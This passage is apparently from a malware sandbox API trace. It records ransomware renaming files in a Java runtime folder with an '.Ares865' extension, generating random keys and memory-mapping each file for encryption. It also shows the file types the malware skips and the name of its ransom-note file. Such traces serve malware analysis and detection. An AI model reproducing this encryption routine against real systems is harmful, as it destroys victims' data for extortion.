(hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x82350) returned 0x420000 [0132.105] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.113] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jfxrt.jar" | out: lpString1="jfxrt.jar") returned="jfxrt.jar" [0132.113] lstrlenW (lpString="jfxrt.jar") returned 9 [0132.113] lstrlenW (lpString="Ares865") returned 7 [0132.113] lstrcmpiW (lpString1="xrt.jar", lpString2="Ares865") returned 1 [0132.113] lstrlenW (lpString=".dll") returned 4 [0132.113] lstrcmpiW (lpString1="jfxrt.jar", lpString2=".dll") returned 1 [0132.113] lstrlenW (lpString=".lnk") returned 4 [0132.113] lstrcmpiW (lpString1="jfxrt.jar", lpString2=".lnk") returned 1 [0132.113] lstrlenW (lpString=".ini") returned 4 [0132.113] lstrcmpiW (lpString1="jfxrt.jar", lpString2=".ini") returned 1 [0132.113] lstrlenW (lpString=".sys") returned 4 [0132.113] lstrcmpiW (lpString1="jfxrt.jar", lpString2=".sys") returned 1 [0132.113] lstrlenW (lpString="jfxrt.jar") returned 9 [0132.113] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.Ares865") returned 54 [0132.114] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar.ares865"), dwFlags=0x1) returned 1 [0132.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jfxrt.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jfxrt.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=13526060) returned 1 [0132.117] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.118] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xce6730, lpName=0x0) returned 0x170 [0132.119] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0xc00000, dwNumberOfBytesToMap=0xe6730) returned 0xdd0000 [0132.257] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.258] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.258] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.275] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jsse.jar" | out: lpString1="jsse.jar") returned="jsse.jar" [0132.275] lstrlenW (lpString="jsse.jar") returned 8 [0132.275] lstrlenW (lpString="Ares865") returned 7 [0132.275] lstrcmpiW (lpString1="sse.jar", lpString2="Ares865") returned 1 [0132.275] lstrlenW (lpString=".dll") returned 4 [0132.275] lstrcmpiW (lpString1="jsse.jar", lpString2=".dll") returned 1 [0132.275] lstrlenW (lpString=".lnk") returned 4 [0132.275] lstrcmpiW (lpString1="jsse.jar", lpString2=".lnk") returned 1 [0132.275] lstrlenW (lpString=".ini") returned 4 [0132.276] lstrcmpiW (lpString1="jsse.jar", lpString2=".ini") returned 1 [0132.276] lstrlenW (lpString=".sys") returned 4 [0132.276] lstrcmpiW (lpString1="jsse.jar", lpString2=".sys") returned 1 [0132.276] lstrlenW (lpString="jsse.jar") returned 8 [0132.276] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.Ares865") returned 53 [0132.276] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar.ares865"), dwFlags=0x1) returned 1 [0132.281] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jsse.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jsse.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.281] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=526795) returned 1 [0132.281] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.283] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80cd0, lpName=0x0) returned 0x170 [0132.284] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80cd0) returned 0x420000 [0132.305] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.306] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.306] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.313] lstrcpyW (in: lpString1=0x2cce44a, lpString2="jvm.hprof.txt" | out: lpString1="jvm.hprof.txt") returned="jvm.hprof.txt" [0132.313] lstrlenW (lpString="jvm.hprof.txt") returned 13 [0132.313] lstrlenW (lpString="Ares865") returned 7 [0132.313] lstrcmpiW (lpString1="rof.txt", lpString2="Ares865") returned 1 [0132.313] lstrlenW (lpString=".dll") returned 4 [0132.313] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2=".dll") returned 1 [0132.313] lstrlenW (lpString=".lnk") returned 4 [0132.313] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2=".lnk") returned 1 [0132.313] lstrlenW (lpString=".ini") returned 4 [0132.314] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2=".ini") returned 1 [0132.314] lstrlenW (lpString=".sys") returned 4 [0132.314] lstrcmpiW (lpString1="jvm.hprof.txt", lpString2=".sys") returned 1 [0132.314] lstrlenW (lpString="jvm.hprof.txt") returned 13 [0132.314] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.Ares865") returned 58 [0132.314] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.ares865"), dwFlags=0x1) returned 1 [0132.317] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\jvm.hprof.txt.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\jvm.hprof.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4226) returned 1 [0132.317] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.318] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.318] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.318] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1390, lpName=0x0) returned 0x170 [0132.320] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1390) returned 0x190000 [0132.321] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.322] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.322] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.322] lstrcpyW (in: lpString1=0x2cce44a, lpString2="logging.properties" | out: lpString1="logging.properties") returned="logging.properties" [0132.322] lstrlenW (lpString="logging.properties") returned 18 [0132.322] lstrlenW (lpString="Ares865") returned 7 [0132.322] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0132.322] lstrlenW (lpString=".dll") returned 4 [0132.322] lstrcmpiW (lpString1="logging.properties", lpString2=".dll") returned 1 [0132.322] lstrlenW (lpString=".lnk") returned 4 [0132.322] lstrcmpiW (lpString1="logging.properties", lpString2=".lnk") returned 1 [0132.322] lstrlenW (lpString=".ini") returned 4 [0132.323] lstrcmpiW (lpString1="logging.properties", lpString2=".ini") returned 1 [0132.323] lstrlenW (lpString=".sys") returned 4 [0132.323] lstrcmpiW (lpString1="logging.properties", lpString2=".sys") returned 1 [0132.323] lstrlenW (lpString="logging.properties") returned 18 [0132.323] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.Ares865") returned 63 [0132.323] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties.ares865"), dwFlags=0x1) returned 1 [0132.325] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\logging.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\logging.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.325] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2455) returned 1 [0132.325] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.326] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.326] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.326] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xca0, lpName=0x0) returned 0x170 [0132.327] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xca0) returned 0x190000 [0132.328] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.329] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.329] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.329] lstrcpyW (in: lpString1=0x2cce44a, lpString2="management" | out: lpString1="management") returned="management" [0132.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0132.329] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0132.330] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b10 | out: ListHead=0x2e7710, ListEntry=0x2e7b10) returned 0x2e7af0 [0132.330] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x744bcf20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x744bcf20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x744bcf20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x181, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2="aoldtz.exe") returned 1 [0132.330] lstrcpyW (in: lpString1=0x2cce44a, lpString2="management-agent.jar" | out: lpString1="management-agent.jar") returned="management-agent.jar" [0132.330] lstrlenW (lpString="management-agent.jar") returned 20 [0132.330] lstrlenW (lpString="Ares865") returned 7 [0132.330] lstrcmpiW (lpString1="ent.jar", lpString2="Ares865") returned 1 [0132.330] lstrlenW (lpString=".dll") returned 4 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2=".dll") returned 1 [0132.330] lstrlenW (lpString=".lnk") returned 4 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2=".lnk") returned 1 [0132.330] lstrlenW (lpString=".ini") returned 4 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2=".ini") returned 1 [0132.330] lstrlenW (lpString=".sys") returned 4 [0132.330] lstrcmpiW (lpString1="management-agent.jar", lpString2=".sys") returned 1 [0132.330] lstrlenW (lpString="management-agent.jar") returned 20 [0132.330] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.Ares865") returned 65 [0132.330] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar.ares865"), dwFlags=0x1) returned 1 [0132.332] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\management-agent.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management-agent.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=385) returned 1 [0132.332] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.333] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.333] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.333] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x490, lpName=0x0) returned 0x170 [0132.335] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x490) returned 0x190000 [0132.336] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.337] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.337] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.337] lstrcpyW (in: lpString1=0x2cce44a, lpString2="meta-index" | out: lpString1="meta-index") returned="meta-index" [0132.337] lstrlenW (lpString="meta-index") returned 10 [0132.337] lstrlenW (lpString="Ares865") returned 7 [0132.337] lstrcmpiW (lpString1="a-index", lpString2="Ares865") returned -1 [0132.337] lstrlenW (lpString=".dll") returned 4 [0132.337] lstrcmpiW (lpString1="meta-index", lpString2=".dll") returned 1 [0132.338] lstrlenW (lpString=".lnk") returned 4 [0132.338] lstrcmpiW (lpString1="meta-index", lpString2=".lnk") returned 1 [0132.338] lstrlenW (lpString=".ini") returned 4 [0132.338] lstrcmpiW (lpString1="meta-index", lpString2=".ini") returned 1 [0132.338] lstrlenW (lpString=".sys") returned 4 [0132.338] lstrcmpiW (lpString1="meta-index", lpString2=".sys") returned 1 [0132.338] lstrlenW (lpString="meta-index") returned 10 [0132.338] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.Ares865") returned 55 [0132.338] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index.ares865"), dwFlags=0x1) returned 1 [0132.340] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.340] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2190) returned 1 [0132.340] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.341] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.341] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.341] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb90, lpName=0x0) returned 0x170 [0132.345] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb90) returned 0x190000 [0132.348] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.349] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.349] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.349] lstrcpyW (in: lpString1=0x2cce44a, lpString2="net.properties" | out: lpString1="net.properties") returned="net.properties" [0132.349] lstrlenW (lpString="net.properties") returned 14 [0132.349] lstrlenW (lpString="Ares865") returned 7 [0132.349] lstrcmpiW (lpString1="perties", lpString2="Ares865") returned 1 [0132.349] lstrlenW (lpString=".dll") returned 4 [0132.349] lstrcmpiW (lpString1="net.properties", lpString2=".dll") returned 1 [0132.349] lstrlenW (lpString=".lnk") returned 4 [0132.350] lstrcmpiW (lpString1="net.properties", lpString2=".lnk") returned 1 [0132.350] lstrlenW (lpString=".ini") returned 4 [0132.350] lstrcmpiW (lpString1="net.properties", lpString2=".ini") returned 1 [0132.350] lstrlenW (lpString=".sys") returned 4 [0132.350] lstrcmpiW (lpString1="net.properties", lpString2=".sys") returned 1 [0132.350] lstrlenW (lpString="net.properties") returned 14 [0132.350] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.Ares865") returned 59 [0132.350] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties.ares865"), dwFlags=0x1) returned 1 [0132.351] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\net.properties.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\net.properties.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3070) returned 1 [0132.352] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.353] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.353] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.353] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xf00, lpName=0x0) returned 0x170 [0132.354] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf00) returned 0x190000 [0132.355] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.356] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.356] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.356] lstrcpyW (in: lpString1=0x2cce44a, lpString2="plugin.jar" | out: lpString1="plugin.jar") returned="plugin.jar" [0132.356] lstrlenW (lpString="plugin.jar") returned 10 [0132.356] lstrlenW (lpString="Ares865") returned 7 [0132.356] lstrcmpiW (lpString1="gin.jar", lpString2="Ares865") returned 1 [0132.356] lstrlenW (lpString=".dll") returned 4 [0132.356] lstrcmpiW (lpString1="plugin.jar", lpString2=".dll") returned 1 [0132.356] lstrlenW (lpString=".lnk") returned 4 [0132.357] lstrcmpiW (lpString1="plugin.jar", lpString2=".lnk") returned 1 [0132.357] lstrlenW (lpString=".ini") returned 4 [0132.357] lstrcmpiW (lpString1="plugin.jar", lpString2=".ini") returned 1 [0132.357] lstrlenW (lpString=".sys") returned 4 [0132.357] lstrcmpiW (lpString1="plugin.jar", lpString2=".sys") returned 1 [0132.357] lstrlenW (lpString="plugin.jar") returned 10 [0132.357] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.Ares865") returned 55 [0132.357] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar.ares865"), dwFlags=0x1) returned 1 [0132.359] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\plugin.jar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\plugin.jar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0132.359] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1924760) returned 1 [0132.359] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0132.360] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0132.360] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.360] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d61a0, lpName=0x0) returned 0x170 [0132.362] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d61a0) returned 0x3030000 [0132.435] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0132.436] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0132.436] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0132.462] lstrcpyW (in: lpString1=0x2cce44a, lpString2="psfont.properties.ja" | out: lpString1="psfont.properties.ja") returned="psfont.properties.ja" [0132.462] lstrlenW (lpString="psfont.properties.ja") returned 20 [0132.462] lstrlenW (lpString="Ares865") returned 7 [0132.462] lstrcmpiW (lpString1="ties.ja", lpString2="Ares865") returned 1 [0132.462] lstrlenW (lpString=".dll") returned 4 [0132.462] lstrcmpiW (lpString1="psfont.properties.ja", lpString2=".dll") returned 1 [0132.462] lstrlenW (lpString=".lnk") returned 4 [0132.462] lstrcmpiW (lpString1="psfont.properties.ja", lpString2=".lnk") returned 1 [0132.462] lstrlenW (lpString=".ini") returned 4 [0132.462] lstrcmpiW (lpString1="psfont.properties.ja", lpString2=".ini") returned 1 [0132.462] lstrlenW (lpString=".sys") returned 4 [0132.462] lstrcmpiW (lpString1="psfont.properties.ja", lpString2=".sys") returned 1 [0132.462] lstrlenW (lpString="psfont.properties.ja") returned 20 [0132.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.Ares865") returned 65 [0132.463] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\psfont.properties.ja.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\psfont.properties.ja.ares865"), dwFlags=0x1) returned 1 [0132.465] CreateFileW 